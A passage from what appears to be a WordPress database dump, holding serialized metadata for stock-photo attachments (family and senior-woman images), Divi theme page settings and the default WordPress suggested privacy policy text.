oodluz - stock.adobe.com\";s:6:\"camera\";s:9:\"ILCE-7RM2\";s:7:\"caption\";s:53:\"Senior woman checking expiration date on food product\";s:17:\"created_timestamp\";s:10:\"1492159503\";s:9:\"copyright\";s:27:\"©goodluz - stock.adobe.com\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"800\";s:13:\"shutter_speed\";s:17:\"0.016666666666667\";s:5:\"title\";s:53:\"Senior woman checking expiration date on food product\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:44:{i:0;s:6:\"senior\";i:1;s:5:\"woman\";i:2;s:6:\"fridge\";i:3;s:8:\"checking\";i:4;s:15:\"expiration date\";i:5;s:5:\"valid\";i:6;s:7:\"product\";i:7;s:5:\"salad\";i:8;s:4:\"food\";i:9;s:7:\"kitchen\";i:10;s:5:\"lunch\";i:11;s:4:\"home\";i:12;s:15:\"65-70 years old\";i:13;s:7:\"healthy\";i:14;s:7:\"indoors\";i:15;s:7:\"retired\";i:16;s:7:\"elderly\";i:17;s:6:\"people\";i:18;s:9:\"lifestyle\";i:19;s:7:\"glasses\";i:20;s:10:\"eyeglasses\";i:21;s:7:\"reading\";i:22;s:6:\"senior\";i:23;s:5:\"woman\";i:24;s:6:\"fridge\";i:25;s:8:\"checking\";i:26;s:15:\"expiration date\";i:27;s:5:\"valid\";i:28;s:7:\"product\";i:29;s:5:\"salad\";i:30;s:4:\"food\";i:31;s:7:\"kitchen\";i:32;s:5:\"lunch\";i:33;s:4:\"home\";i:34;s:15:\"65-70 years old\";i:35;s:7:\"healthy\";i:36;s:7:\"indoors\";i:37;s:7:\"retired\";i:38;s:7:\"elderly\";i:39;s:6:\"people\";i:40;s:9:\"lifestyle\";i:41;s:7:\"glasses\";i:42;s:10:\"eyeglasses\";i:43;s:7:\"reading\";}}s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"81\";s:8:\"quantity\";d:80;s:4:\"webp\";i:0;}}'),(236,68,'_thumbnail_id','69'),(246,71,'_edit_lock','1679247557:3'),(245,71,'_edit_last','3'),(239,68,'_et_post_bg_color','#ffffff'),(240,68,'_et_post_bg_layout','light'),(241,68,'_et_pb_show_title','on'),(242,68,'_et_pb_post_hide_nav','default'),(243,68,'_et_pb_page_layout','et_right_sidebar'),(244,68,'_et_pb_side_nav','off'),(247,72,'_wp_attached_file','2023/03/Family-having-fun-at-home-1000x664-1.jpg'),(248,72,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:1000;s:6:\"height\";i:664;s:4:\"file\";s:48:\"2023/03/Family-having-fun-at-home-1000x664-1.jpg\";s:8:\"filesize\";i:452451;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:48:\"Family-having-fun-at-home-1000x664-1-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:41864;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:48:\"Family-having-fun-at-home-1000x664-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:32678;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:48:\"Family-having-fun-at-home-1000x664-1-768x510.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:510;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:100045;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:48:\"Family-having-fun-at-home-1000x664-1-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:50629;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:48:\"Family-having-fun-at-home-1000x664-1-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:53901;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:48:\"Family-having-fun-at-home-1000x664-1-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:69620;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:48:\"Family-having-fun-at-home-1000x664-1-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:73213;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:48:\"Family-having-fun-at-home-1000x664-1-980x651.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:651;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:136102;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:48:\"Family-having-fun-at-home-1000x664-1-480x319.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:319;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:60599;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:22:\"Rido - stock.adobe.com\";s:6:\"camera\";s:10:\"NIKON D810\";s:7:\"caption\";s:185:\"Happy multiethnic family sitting on sofa laughing together. Cheerful parents playing with their sons at home. Black father tickles his little boy while the mother and the brother smile.\";s:17:\"created_timestamp\";s:10:\"1486944000\";s:9:\"copyright\";s:7:\"© Rido\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:25:\"Family having fun at home\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:34:{i:0;s:6:\"family\";i:1;s:5:\"happy\";i:2;s:3:\"fun\";i:3;s:3:\"son\";i:4;s:7:\"playing\";i:5;s:11:\"multiethnic\";i:6;s:4:\"home\";i:7;s:7:\"smiling\";i:8;s:4:\"play\";i:9;s:8:\"enjoying\";i:10;s:3:\"joy\";i:11;s:5:\"laugh\";i:12;s:3:\"man\";i:13;s:5:\"woman\";i:14;s:3:\"boy\";i:15;s:8:\"cheerful\";i:16;s:5:\"couch\";i:17;s:6:\"father\";i:18;s:6:\"mother\";i:19;s:6:\"parent\";i:20;s:8:\"together\";i:21;s:5:\"young\";i:22;s:5:\"child\";i:23;s:7:\"brother\";i:24;s:7:\"african\";i:25;s:4:\"sofa\";i:26;s:5:\"black\";i:27;s:5:\"latin\";i:28;s:8:\"hispanic\";i:29;s:6:\"ethnic\";i:30;s:8:\"laughing\";i:31;s:6:\"people\";i:32;s:3:\"kid\";i:33;s:5:\"smile\";}}s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"80\";s:8:\"quantity\";d:80;s:4:\"webp\";i:0;}}'),(249,71,'_thumbnail_id','72'),(259,74,'_edit_lock','1679247581:3'),(258,74,'_edit_last','3'),(252,71,'_et_post_bg_color','#ffffff'),(253,71,'_et_post_bg_layout','light'),(254,71,'_et_pb_show_title','on'),(255,71,'_et_pb_post_hide_nav','default'),(256,71,'_et_pb_page_layout','et_right_sidebar'),(257,71,'_et_pb_side_nav','off'),(260,75,'_wp_attached_file','2023/03/Happy-Family-1000x634-1.jpg'),(261,75,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:1000;s:6:\"height\";i:634;s:4:\"file\";s:35:\"2023/03/Happy-Family-1000x634-1.jpg\";s:8:\"filesize\";i:516741;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:35:\"Happy-Family-1000x634-1-300x190.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:190;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42343;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:35:\"Happy-Family-1000x634-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:34457;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:35:\"Happy-Family-1000x634-1-768x487.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:487;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:106124;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:35:\"Happy-Family-1000x634-1-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:52478;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:35:\"Happy-Family-1000x634-1-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:57002;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:35:\"Happy-Family-1000x634-1-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75551;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:35:\"Happy-Family-1000x634-1-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:80636;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:35:\"Happy-Family-1000x634-1-980x621.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:621;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:144901;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:35:\"Happy-Family-1000x634-1-480x304.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:304;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62080;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"NIKON D610\";s:7:\"caption\";s:49:\"Parents and their children are looking at camera.\";s:17:\"created_timestamp\";s:10:\"1473866960\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"70\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:6:\"0.0025\";s:5:\"title\";s:49:\"Parents and their children are looking at camera.\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:50:{i:0;s:5:\"adult\";i:1;s:10:\"background\";i:2;s:9:\"beautiful\";i:3;s:3:\"boy\";i:4;s:9:\"caucasian\";i:5;s:5:\"child\";i:6;s:9:\"childhood\";i:7;s:7:\"concept\";i:8;s:6:\"cuddle\";i:9;s:4:\"cute\";i:10;s:3:\"dad\";i:11;s:8:\"daughter\";i:12;s:7:\"embrace\";i:13;s:10:\"expression\";i:14;s:6:\"family\";i:15;s:6:\"father\";i:16;s:6:\"female\";i:17;s:4:\"four\";i:18;s:3:\"fun\";i:19;s:4:\"girl\";i:20;s:8:\"handsome\";i:21;s:9:\"happiness\";i:22;s:5:\"happy\";i:23;s:4:\"home\";i:24;s:3:\"hug\";i:25;s:7:\"indoors\";i:26;s:3:\"joy\";i:27;s:4:\"kids\";i:28;s:7:\"leisure\";i:29;s:9:\"lifestyle\";i:30;s:6:\"living\";i:31;s:4:\"love\";i:32;s:4:\"male\";i:33;s:3:\"man\";i:34;s:3:\"mom\";i:35;s:6:\"mother\";i:36;s:9:\"offspring\";i:37;s:6:\"parent\";i:38;s:10:\"parenthood\";i:39;s:6:\"people\";i:40;s:8:\"portrait\";i:41;s:7:\"relaxed\";i:42;s:4:\"room\";i:43;s:5:\"smile\";i:44;s:3:\"son\";i:45;s:5:\"stand\";i:46;s:8:\"together\";i:47;s:5:\"white\";i:48;s:5:\"woman\";i:49;s:5:\"young\";}}s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"81\";s:8:\"quantity\";d:70;s:4:\"webp\";i:0;}}'),(262,74,'_thumbnail_id','75'),(272,77,'_edit_lock','1679247610:3'),(271,77,'_edit_last','3'),(265,74,'_et_post_bg_color','#ffffff'),(266,74,'_et_post_bg_layout','light'),(267,74,'_et_pb_show_title','on'),(268,74,'_et_pb_post_hide_nav','default'),(269,74,'_et_pb_page_layout','et_right_sidebar'),(270,74,'_et_pb_side_nav','off'),(273,78,'_wp_attached_file','2023/03/concept-of-housing-and-relocation.-happy-family-mother-father-and-kids-with-roof-at-home-1000x660-1.jpg'),(274,78,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:1000;s:6:\"height\";i:660;s:4:\"file\";s:111:\"2023/03/concept-of-housing-and-relocation.-happy-family-mother-father-and-kids-with-roof-at-home-1000x660-1.jpg\";s:8:\"filesize\";i:497115;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:111:\"concept-of-housing-and-relocation.-happy-family-mother-father-and-kids-with-roof-at-home-1000x660-1-300x198.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:45177;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:111:\"concept-of-housing-and-relocation.-happy-family-mother-father-and-kids-with-roof-at-home-1000x660-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:36582;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:111:\"concept-of-housing-and-relocation.-happy-family-mother-father-and-kids-with-roof-at-home-1000x660-1-768x507.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:507;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:105195;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:111:\"concept-of-housing-and-relocation.-happy-family-mother-father-and-kids-with-roof-at-home-1000x660-1-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:54550;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:111:\"concept-of-housing-and-relocation.-happy-family-mother-father-and-kids-with-roof-at-home-1000x660-1-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:56954;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:111:\"concept-of-housing-and-relocation.-happy-family-mother-father-and-kids-with-roof-at-home-1000x660-1-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:73274;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:111:\"concept-of-housing-and-relocation.-happy-family-mother-father-and-kids-with-roof-at-home-1000x660-1-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:78510;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:111:\"concept-of-housing-and-relocation.-happy-family-mother-father-and-kids-with-roof-at-home-1000x660-1-980x647.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:647;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:141117;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:111:\"concept-of-housing-and-relocation.-happy-family-mother-father-and-kids-with-roof-at-home-1000x660-1-480x317.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:317;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:64481;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"2\";s:6:\"credit\";s:29:\"JenkoAtaman - stock.adobe.com\";s:6:\"camera\";s:11:\"Canon EOS R\";s:7:\"caption\";s:91:\"concept of housing and relocation. happy family mother father and kids with roof at a  home\";s:17:\"created_timestamp\";s:10:\"1551880194\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"85\";s:3:\"iso\";s:3:\"320\";s:13:\"shutter_speed\";s:7:\"0.00625\";s:5:\"title\";s:88:\"concept of housing and relocation. happy family mother father and kids with roof at home\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:50:{i:0;s:6:\"family\";i:1;s:4:\"home\";i:2;s:5:\"happy\";i:3;s:6:\"parent\";i:4;s:6:\"mother\";i:5;s:6:\"father\";i:6;s:9:\"caucasian\";i:7;s:4:\"girl\";i:8;s:5:\"young\";i:9;s:8:\"daughter\";i:10;s:4:\"male\";i:11;s:6:\"people\";i:12;s:6:\"female\";i:13;s:5:\"child\";i:14;s:6:\"indoor\";i:15;s:3:\"boy\";i:16;s:7:\"sitting\";i:17;s:4:\"sofa\";i:18;s:4:\"love\";i:19;s:5:\"smile\";i:20;s:3:\"son\";i:21;s:5:\"adult\";i:22;s:4:\"cute\";i:23;s:9:\"happiness\";i:24;s:4:\"room\";i:25;s:9:\"lifestyle\";i:26;s:12:\"togetherness\";i:27;s:3:\"fun\";i:28;s:5:\"group\";i:29;s:7:\"looking\";i:30;s:8:\"interior\";i:31;s:5:\"white\";i:32;s:6:\"little\";i:33;s:8:\"portrait\";i:34;s:4:\"four\";i:35;s:9:\"offspring\";i:36;s:3:\"men\";i:37;s:8:\"domestic\";i:38;s:10:\"positivity\";i:39;s:5:\"woman\";i:40;s:12:\"affectionate\";i:41;s:3:\"man\";i:42;s:8:\"together\";i:43;s:10:\"relocation\";i:44;s:7:\"concept\";i:45;s:4:\"roof\";i:46;s:6:\"moving\";i:47;s:8:\"mortgage\";i:48;s:3:\"kid\";i:49;s:8:\"laughing\";}}s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"81\";s:8:\"quantity\";d:70;s:4:\"webp\";i:0;}}'),(275,77,'_thumbnail_id','78'),(285,80,'_edit_lock','1679247641:3'),(284,80,'_edit_last','3'),(278,77,'_et_post_bg_color','#ffffff'),(279,77,'_et_post_bg_layout','light'),(280,77,'_et_pb_show_title','on'),(281,77,'_et_pb_post_hide_nav','default'),(282,77,'_et_pb_page_layout','et_right_sidebar'),(283,77,'_et_pb_side_nav','off'),(286,81,'_wp_attached_file','2023/03/Child-hands-showing-one-two-and-three-fingers-1000x667-1.jpg'),(287,81,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:1000;s:6:\"height\";i:667;s:4:\"file\";s:68:\"2023/03/Child-hands-showing-one-two-and-three-fingers-1000x667-1.jpg\";s:8:\"filesize\";i:300524;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:68:\"Child-hands-showing-one-two-and-three-fingers-1000x667-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24005;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:68:\"Child-hands-showing-one-two-and-three-fingers-1000x667-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19090;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:68:\"Child-hands-showing-one-two-and-three-fingers-1000x667-1-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:54438;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:68:\"Child-hands-showing-one-two-and-three-fingers-1000x667-1-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29115;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:68:\"Child-hands-showing-one-two-and-three-fingers-1000x667-1-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30636;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:68:\"Child-hands-showing-one-two-and-three-fingers-1000x667-1-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39599;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:68:\"Child-hands-showing-one-two-and-three-fingers-1000x667-1-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:36043;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:68:\"Child-hands-showing-one-two-and-three-fingers-1000x667-1-980x654.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:654;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:73413;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:68:\"Child-hands-showing-one-two-and-three-fingers-1000x667-1-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33931;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"16\";s:6:\"credit\";s:26:\"dezign56 - stock.adobe.com\";s:6:\"camera\";s:13:\"Canon EOS 10D\";s:7:\"caption\";s:46:\"Child hands showing one, two and three fingers\";s:17:\"created_timestamp\";s:10:\"1218482042\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:3:\"0.3\";s:5:\"title\";s:18:\"One, two and three\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:28:{i:0;s:5:\"Child\";i:1;s:4:\"hand\";i:2;s:7:\"showing\";i:3;s:3:\"one\";i:4;s:3:\"two\";i:5;s:5:\"three\";i:6;s:1:\"1\";i:7;s:1:\"2\";i:8;s:1:\"3\";i:9;s:6:\"finger\";i:10;s:6:\"number\";i:11;s:5:\"young\";i:12;s:3:\"boy\";i:13;s:4:\"girl\";i:14;s:5:\"human\";i:15;s:4:\"sign\";i:16;s:8:\"language\";i:17;s:4:\"skin\";i:18;s:5:\"small\";i:19;s:5:\"thumb\";i:20;s:5:\"wrist\";i:21;s:5:\"nails\";i:22;s:7:\"concept\";i:23;s:10:\"conceptual\";i:24;s:6:\"object\";i:25;s:8:\"isolated\";i:26;s:6:\"cutout\";i:27;s:16:\"white background\";}}s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"78\";s:8:\"quantity\";d:90;s:4:\"webp\";i:0;}}'),(288,80,'_thumbnail_id','81'),(291,80,'_et_post_bg_color','#ffffff'),(292,80,'_et_post_bg_layout','light'),(293,80,'_et_pb_show_title','on'),(294,80,'_et_pb_post_hide_nav','default'),(295,80,'_et_pb_page_layout','et_right_sidebar'),(296,80,'_et_pb_side_nav','off'),(1476,416,'_et_pb_use_builder',''),(1477,416,'_et_pb_first_image',''),(3158,345,'_et_dynamic_cached_shortcodes','a:6:{i:0;s:13:\"et_pb_section\";i:1;s:9:\"et_pb_row\";i:2;s:12:\"et_pb_column\";i:30;s:11:\"et_pb_image\";i:33;s:10:\"et_pb_menu\";i:49;s:10:\"et_pb_text\";}'),(2878,819,'_et_pb_page_layout','et_right_sidebar'),(2879,819,'_et_pb_side_nav','off'),(2880,819,'_et_pb_use_builder','on'),(2881,819,'_et_pb_first_image',''),(2882,819,'_et_pb_truncate_post',''),(2883,819,'_et_pb_truncate_post_date',''),(2895,819,'_et_pb_custom_css',''),(2886,819,'_et_builder_dynamic_assets_loading_attr_threshold','4'),(2896,819,'_et_pb_gutter_width','3'),(2898,819,'_global_colors_info','{}'),(2899,819,'_et_builder_version','VB|Divi|4.20.2'),(354,3,'_wp_suggested_privacy_policy_content','a:3:{s:11:\"plugin_name\";s:9:\"WordPress\";s:11:\"policy_text\";s:4241:\"<h2>Who we are</h2><p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>Our website address is: http://cmdev-site1.com.</p><h2>Comments</h2><p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>When visitors leave comments on the site we collect the data shown in the comments form, and also the visitor&#8217;s IP address and browser user agent string to help spam detection.</p><p>An anonymized string created from your email address (also called a hash) may be provided to the Gravatar service to see if you are using it. The Gravatar service privacy policy is available here: https://automattic.com/privacy/. After approval of your comment, your profile picture is visible to the public in the context of your comment.</p><h2>Media</h2><p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>If you upload images to the website, you should avoid uploading images with embedded location data (EXIF GPS) included. Visitors to the website can download and extract any location data from images on the website.</p><h2>Cookies</h2><p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>If you leave a comment on our site you may opt-in to saving your name, email address and website in cookies. These are for your convenience so that you do not have to fill in your details again when you leave another comment. These cookies will last for one year.</p><p>If you visit our login page, we will set a temporary cookie to determine if your browser accepts cookies. This cookie contains no personal data and is discarded when you close your browser.</p><p>When you log in, we will also set up several cookies to save your login information and your screen display choices. Login cookies last for two days, and screen options cookies last for a year. If you select &quot;Remember Me&quot;, your login will persist for two weeks. If you log out of your account, the login cookies will be removed.</p><p>If you edit or publish an article, an additional cookie will be saved in your browser. This cookie includes no personal data and simply indicates the post ID of the article you just edited. It expires after 1 day.</p><h2>Embedded content from other websites</h2><p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>Articles on this site may include embedded content (e.g. videos, images, articles, etc.). Embedded content from other websites behaves in the exact same way as if the visitor has visited the other website.</p><p>These websites may collect data about you, use cookies, embed additional third-party tracking, and monitor your interaction with that embedded content, including tracking your interaction with the embedded content if you have an account and are logged in to that website.</p><h2>Who we share your data with</h2><p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>If you request a password reset, your IP address will be included in the reset email.</p><h2>How long we retain your data</h2><p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>If you leave a comment, the comment and its metadata are retained indefinitely. This is so we can recognize and approve any follow-up comments automatically instead of holding them in a moderation queue.</p><p>For users that register on our website (if any), we also store the personal information they provide in their user profile. All users can see, edit, or delete their personal information at any time (except they cannot change their username). Website administrators can also see and edit that information.</p><h2>What rights you have over your data</h2><p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>If you have an account on this site, or have left comments, you can request to receive an exported file of the personal data we hold about you, including any data you have provided to us. You can also request that we erase any personal data we hold about you. This does not include any data we are obliged to keep for administrative, legal, or security purposes.</p><h2>Where your data is sent</h2><p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>Visitor comments may be checked through an automated spam detection service.</p>\";s:5:\"added\";i:1677705271;}'),(2012,528,'_thumbnail_id','0'),(2013,528,'_global_colors_info','{}'),(2014,528,'_et_pb_first_image',''),(1823,472,'_wp_attached_file','2023/03/People-Icon.png'),(1824,472,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:1143;s:6:\"height\";i:962;s:4:\"file\";s:23:\"2023/03/People-Icon.png\";s:8:\"filesize\";i:88186;s:5:\"sizes\";a:12:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"People-Icon-300x252.png\";s:5:\"width\";i:300;s:6:\"height\";i:252;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:21632;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"People-Icon-1024x862.png\";s:5:\"width\";i:1024;s:6:\"height\";i:862;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:86235;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"People-Icon-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10830;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"People-Icon-768x646.png\";s:5:\"width\";i:768;s:6:\"height\";i:646;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:63331;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:23:\"People-Icon-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:26631;}s:31:\"et-pb-post-main-image-fullwidth\";a:5:{s:4:\"file\";s:24:\"People-Icon-1080x675.png\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:79306;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:23:\"People-Icon-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:28466;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:23:\"People-Icon-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:38384;}s:28:\"et-pb-portfolio-image-single\";a:5:{s:4:\"file\";s:24:\"People-Icon-1080x909.png\";s:5:\"width\";i:1080;s:6:\"height\";i:909;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:92183;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:23:\"People-Icon-400x516.png\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:41038;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:23:\"People-Icon-980x825.png\";s:5:\"width\";i:980;s:6:\"height\";i:825;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:82237;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:23:\"People-Icon-480x404.png\";s:5:\"width\";i:480;s: